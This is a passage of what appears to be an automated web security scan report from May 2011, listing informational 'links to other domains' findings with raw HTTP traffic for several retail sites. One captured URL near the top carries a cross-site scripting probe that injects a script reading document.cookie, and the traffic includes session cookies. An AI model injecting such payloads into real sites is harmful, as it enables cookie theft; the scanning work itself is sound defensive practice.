       <IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=;u6=;u7=;ord=1;num=5025715?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://eval.bizrate.com/js/survey_126457_1.js"></script>


   <iframe width="1" height="1" frameborder="0" src="http://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1">
</iframe>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">


           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...


<script src="http://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

17.39. https://www.gnc.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/checkout/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.gnc.com/checkout/index.jsp?process=orderTrackingLogin

The response contains the following links to other domains:

https://dsa.csdata1.com/data/js/10040766/csgather.js
https://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=https://www.gnc.com/checkout/index.jsp?process=orderTrackingLogin&senduuid=0
https://images.scanalert.com/meter/www.gnc.com/22.gif
https://media.gsimedia.net/tg/gsiutt/store76.js
https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166
https://www.mcafeesecure.com/RatingVerify?ref=www.gnc.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 93720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


...[SNIP]...

                   <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.gnc.com"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.gnc.com/22.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...


   <iframe width="1" height="1" frameborder="0" src="https://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=https://www.gnc.com/checkout/index.jsp?process=orderTrackingLogin&senduuid=0">
</iframe>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">


           <iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...


<script src="https://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

17.40. http://www.guitarcenter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/8956.js
http://paypal.com/
http://twitter.com/guitarcenter
http://view.atdmt.com/iaction/9k1gcr_GCcomRetargeting_1
http://www.bizrate.com/ratings_guide/cust_reviews__mid--141658.html
http://www.facebook.com/GuitarCenter
http://www.gcpro.com/
http://www.guitarcenterblog.com/
http://www.ourstage.com/go/yournextrecordwithtravisbarker
http://www.pricegrabber.com/rating_getreview.php/retid=5866
http://www.vintageguitars.net/
http://www.youtube.com/guitarcenter
https://medals.bizrate.com/medals/dynamic/141658_medal.gif
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.GUITARCENTER.COM&lang=en

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: CjPID=2537521; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: CjAID=10453836; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: source=4ACJWXX2; path=/
Set-Cookie: UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: UNICASOURCEL=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Vary: Accept-Encoding
Content-Length: 217584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.vintageguitars.net/">Vintage</a>
...[SNIP]...
<div style="background-image: none; border: 0pt none; text-align: left; padding: 5px 0px 0px 3px;"><a style="font-weight: normal;" href="http://www.ourstage.com/go/yournextrecordwithtravisbarker"><img style="border: 1px solid rgb(153, 153, 153);" src="http://images.guitarcenter.com/content/home/ynr.jpg">
...[SNIP]...
<div class="social-links">
<a class="social-media" href="http://www.facebook.com/GuitarCenter" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/facebook.png">
...[SNIP]...
</a>
<a class="social-media" href="http://twitter.com/guitarcenter" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/twitter.png">
...[SNIP]...
</a>
<a class="social-media" href="http://www.youtube.com/guitarcenter" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/youtube.png">
...[SNIP]...
</a>
<a class="social-media" href="http://www.guitarcenterblog.com/" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/atgc.png">
...[SNIP]...
<br><script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/8956.js"></script>
...[SNIP]...
<li><a href="http://www.vintageguitars.net/">Vintage Gear</a>
...[SNIP]...
<li><a href="http://www.gcpro.com/" target="_blank">GC Pro</a>
...[SNIP]...
<li><a href="http://paypal.com/" target="_blank"><img src="/includes/guitarcenter/images/buttons/paypal.gif" />
...[SNIP]...
<li><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.GUITARCENTER.COM&lang=en" target="_blank"><img src="/includes/guitarcenter/images/buttons/verisign.gif" />
...[SNIP]...
<li><a href="http://www.pricegrabber.com/rating_getreview.php/retid=5866" target="_blank"><img src="/includes/guitarcenter/images/buttons/pricegrabber.gif" />
...[SNIP]...
<li><a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--141658.html" target="_blank"><img src="https://medals.bizrate.com/medals/dynamic/141658_medal.gif" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/GuitarCenter"><img src="/includes/guitarcenter/images/buttons/facebook.png" target="_blank"/>
...[SNIP]...
<li><a href="http://twitter.com/guitarcenter"><img src="/includes/guitarcenter/images/buttons/twitter.png" target="_blank"/>
...[SNIP]...
<li><a href="http://www.youtube.com/guitarcenter"><img src="/includes/guitarcenter/images/buttons/youtube.png" target="_blank"/>
...[SNIP]...
<li><a href="http://www.guitarcenterblog.com/"><img src="/includes/guitarcenter/images/buttons/gcblog.png" target="_blank"/>
...[SNIP]...
<noscript>
<iframe src="http://view.atdmt.com/iaction/9k1gcr_GCcomRetargeting_1" width="1" height="1"
frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0"
leftmargin="0"></iframe>
...[SNIP]...

17.41. https://www.guitarcenter.com/MyAccount/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/MyAccount/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.guitarcenter.com/MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://medals.bizrate.com/medals/dynamic/141658_medal.gif
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.GUITARCENTER.COM&lang=en

Request

Response

17.42. https://www.helzberg.com/account/login.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/account/login.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.helzberg.com/account/login.do?method=view

The response contains the following links to other domains:

https://dsa.csdata1.com/data/js/1066060/edata1.js
https://fls.doubleclick.net/activityi;src=1564432;type=generl;cat=gen;u1=/account/login.do;ord=-127353189?
https://images.scanalert.com/meter/www.helzberg.com/13.gif
https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO
https://ssl.google-analytics.com/urchin.js
https://www.mcafeesecure.com/RatingVerify?ref=www.helzberg.com
https://www.paypal.com/en_US/i/logo/PayPal_mark_60x38.gif

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: JSP/2.1
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 10:45:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:10 GMT
Connection: keep-alive
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 10:45:10 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 10:45:10 GMT; Path=/
Content-Length: 39770


...[SNIP]...

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</body> tags, as close as possible to the opening tag.
Creation Date: 10/15/2010
-->

<iframe src="https://fls.doubleclick.net/activityi;src=1564432;type=generl;cat=gen;u1=/account/login.do;ord=-127353189?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>


                                                   <script language='javascript' src='https://dsa.csdata1.com/data/js/1066060/edata1.js'></script>
...[SNIP]...
-bin/webscr?cmd=xpt/Marketing/popup/OLCWhatIsPayPal-outside','olcwhatispaypal','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=400, height=350');"><img src="https://www.paypal.com/en_US/i/logo/PayPal_mark_60x38.gif" border="0" alt="Acceptance Mark"></a>
...[SNIP]...
<td valign="middle">
                       <script src=https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO></script>
...[SNIP]...
<td valign="middle">
                       <a href="https://www.mcafeesecure.com/RatingVerify?ref=www.helzberg.com" target="_blank">
                           <img src="//images.scanalert.com/meter/www.helzberg.com/13.gif" border="0"
                               alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses nd online scams"
                               oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"/>
                       </a>
...[SNIP]...

17.43. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.ca
Path:	/webapp/wcs/stores/servlet/Home

Issue detail

The page was loaded from a URL containing a query string:

http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences_all.js
http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&Version=Flash
http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=f3a03e7f-fb3f-4292-b7bc-cb41154d9a9b
http://director.homedepot.ca/HDP/?BannerCode=HDP&Language=en
http://diy.homedepot.ca/diy/project.jsp?pid=399&langId=-15&section=overview
http://essentialaccessibility.com/
http://www.facebook.com/homedepot
http://www.homedepot.com/webapp/wcs/stores/servlet/HomePageView?storeId=10051&catalogId=10053&langId=-1
http://www.homedepot.monstermediaworks.ca/
http://www.homedepotopinion.com/
http://www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1
http://www.twitter.com/homedepotcanada
https://hdc.centah.com/web/?lang=eng&service&intid=homepage_services
https://secure.homedepot.ca/webapp/wcs/stores/servlet/AuctionHomeView?storeId=10051&catalogId=10051&langId=-15
https://secure.homedepot.ca/webapp/wcs/stores/servlet/OrderItemDisplay?storeId=10051&jspStoreDir=HomeDepotCanada&catalogId=10051&langId=-15&krypto=pKJF8DWcRtPBjBInNkE5ng%3D%3D&ddkey=OrderCalculate
https://secure.homedepot.ca/webapp/wcs/stores/servlet/PrivacyPreferencesDisplay?storeId=10051&catalogId=10051&langId=-15

Request

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:53:26 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 09:19:01 GMT
Content-Length: 95123

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
</p>


                       <a class="feature eflyer" href="http://director.homedepot.ca/HDP/?BannerCode=HDP&Language=en"><span>
...[SNIP]...
<div class="featured-destinations">

<a class="shopping-cart" href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/OrderItemDisplay?storeId=10051&jspStoreDir=HomeDepotCanada&catalogId=10051&langId=-15&krypto=pKJF8DWcRtPBjBInNkE5ng%3D%3D&ddkey=OrderCalculate">
<span class="label">
...[SNIP]...
<div id="image-adspot" class="section">
<a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&Version=Flash"><img src="http://www.homedepot.ca/wcsstore/HomeDepotCanada/images/espots/20110510/dreambook-teaser.jpg" alt="Dreambook">
...[SNIP]...
<div class="section simple-sec" id="auction">
<a href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/AuctionHomeView?storeId=10051&catalogId=10051&langId=-15"><h2>
...[SNIP]...
<span class="text-link"><a href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/AuctionHomeView?storeId=10051&catalogId=10051&langId=-15">Place Bid</a>
...[SNIP]...
<h4>
<a href="https://hdc.centah.com/web/?lang=eng&service&intid=homepage_services">Installation Services</a>
...[SNIP]...
</h4>
<a href="https://hdc.centah.com/web/?lang=eng&service&intid=homepage_services"><img src="http://www.homedepot.ca/wcsstore/HomeDepotCanada/images/home-page/services/InstallationServices.jpg" alt="Installation Services">
...[SNIP]...
</a> | <a href="http://diy.homedepot.ca/diy/project.jsp?pid=399&langId=-15&section=overview">Install a Light Fixture</a>
...[SNIP]...
<p>
<a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=f3a03e7f-fb3f-4292-b7bc-cb41154d9a9b">Kitchen Planner</a>
...[SNIP]...
</a> | <a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&Version=Flash">DreamBook</a>
...[SNIP]...
</a> | <a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&Version=Flash">DreamBook</a>
...[SNIP]...
</a>
<a class="icon-accessibility" href="http://essentialaccessibility.com/" target="_blank"></a>
...[SNIP]...
<li><a href="http://www.homedepotopinion.com/" target="_blank">Customer Survey</a>
...[SNIP]...
<li><a href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/PrivacyPreferencesDisplay?storeId=10051&catalogId=10051&langId=-15">Privacy Preferences</a>
...[SNIP]...
<li><a href="http://www.homedepot.monstermediaworks.ca/">Careers in Canada</a>
...[SNIP]...
<li><a href="http://www.homedepot.com/webapp/wcs/stores/servlet/HomePageView?storeId=10051&catalogId=10053&langId=-1">homedepot.com</a>
...[SNIP]...
</span>
<a class="button facebook-button" href="http://www.facebook.com/homedepot" target="_blank">Facebook</a>
...[SNIP]...
</span>
<a class="button twitter-button" href="http://www.twitter.com/homedepotcanada" target="_blank">Twitter</a>
...[SNIP]...


       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>


       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

17.44. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=25222;sz=1x1;ord=1305511047?
http://ad.trafficmp.com/a/bpix?adv=598&id=255&format=1305511047
http://idcs.interclick.com/Segment.aspx?sid=cab0b2f4-a675-49e9-abc7-97bd867f44f5&cacheBust=1305511047
http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1305511047
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=pacsunwear_cs=1&betq=11722=423719nc=1305511047?
http://pixel.mathtag.com/data/img?mt_id=100039&mt_dcid=1305511047

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53brJ,24783,53brJ,18653,53bro,33114,00000,24782,53brJ,32619,00000,32620,00000; RQ=985,53bro,1445,53bro,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,3238,53bro,3677,53bro,3387,53br2,3388,53brH,3389,53brJ,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:27 GMT
Connection: close
Set-Cookie: CH=24785,53c51,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c51,33114,00000,18653,53bro,24782,53c51,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:07:33 GMT
Set-Cookie: RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c51,985,53bro,1445,53bro,1470,53c51,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c51,3173,53c51,3190,53c51,3238,53bro,3677,53bro,3678,53c51; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:07:33 GMT
Content-Length: 982

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://ad.trafficmp.com/a/bpix?adv=598&id=255&format=1305511047" alt="" border="0" width="1" height="1">
<img src="http://idcs.interclick.com/Segment.aspx?sid=cab0b2f4-a675-49e9-abc7-97bd867f44f5&cacheBust=1305511047" alt="" border="0" width="1" height="1">
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=25222;sz=1x1;ord=1305511047?" alt="" border="0" width="1" height="1">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=pacsunwear_cs=1&betq=11722=423719nc=1305511047?" alt="" border="0" width="1" height="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1305511047" alt="" border="0" width="1" height="1">
<img src="http://pixel.mathtag.com/data/img?mt_id=100039&mt_dcid=1305511047" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

17.45. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=fe6rHfZ1&ptid=HOME

The response contains the following link to another domain:

http://pixel.mathtag.com/data/img?mt_id=100040&mt_dcid=1305511191

Request

GET /cgi/r.cgi?m=3&mid=fe6rHfZ1&ptid=HOME HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

17.46. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens

The response contains the following link to another domain:

http://pixel.mathtag.com/data/img?mt_id=100040&mt_dcid=1305510867

Request

Response

17.47. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens

The response contains the following link to another domain:

http://pixel.mathtag.com/data/img?mt_id=100040&mt_dcid=1305511192

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

17.48. http://www.petco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444

The response contains the following links to other domains:

http://edge.liveclicker.net/scripts/jquery.liveclicker.v1-11_c.js
http://images.scanalert.com/meter/www.petco.com/31.gif
http://petco.shoplocal.com/petco/default.aspx?action=nuep&adref=footer
http://petco.shoplocal.com/petco/new_user_entry.aspx?adref=hp
http://twitter.com/PETCO
http://view.atdmt.com/iaction/iwcpet_Homepage_1
http://www.facebook.com/GenNaturalPet
http://www.facebook.com/PETCO
http://www.petcoscoop.com/
https://www.bizrate.com/ratings_guide/cust_reviews__mid--29914.html
https://www.scanalert.com/RatingVerify?ref=www.petco.com

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
